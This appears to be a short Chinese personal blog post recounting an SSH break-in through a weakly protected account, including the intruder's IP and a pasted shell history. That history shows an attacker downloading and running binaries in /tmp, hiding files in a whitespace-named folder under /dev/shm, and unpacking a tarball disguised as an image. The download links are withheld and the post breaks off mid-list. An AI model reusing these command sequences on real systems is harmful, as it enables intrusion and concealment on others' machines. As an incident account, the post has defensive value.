亲身经历了一次Hack攻击

刚才突然发现网络出现异常(出现一些异常的流量),遂调用who命令突然发现iraf用户被人通过ssh登录……都怪我一时疏忽大意,居然给iraf 设置了一个那么简单的密码,而且还开了ssh。结果突然就发现了一个95.77.21.239的IP登录了。我一下子意识到,自己是被黑客攻击了。接着我查了ip归属地,居然是罗马尼亚……肯定只是个幌子。根据和某个高手朋友的结果,鉴定出好在这个黑客不是个高手……如果是的话,我的电脑早就要重装了。然后我查看了一下shell的history发现了如下的操作历史 wget cd /tmp chmod +x * ./bash uname -a   wget tar cat /etc/issue cd /dev/shm mkdir "  " cd "  " wget ***; tar zxvf fb.jpg ; rm -rf fb.jpg ; cd fb ; chmod 777 * ; (为了安全起见,我没有贴出链接) ./0-100 196 ./100-200 196 cd /dev/shm w cd "  " ls -a cd…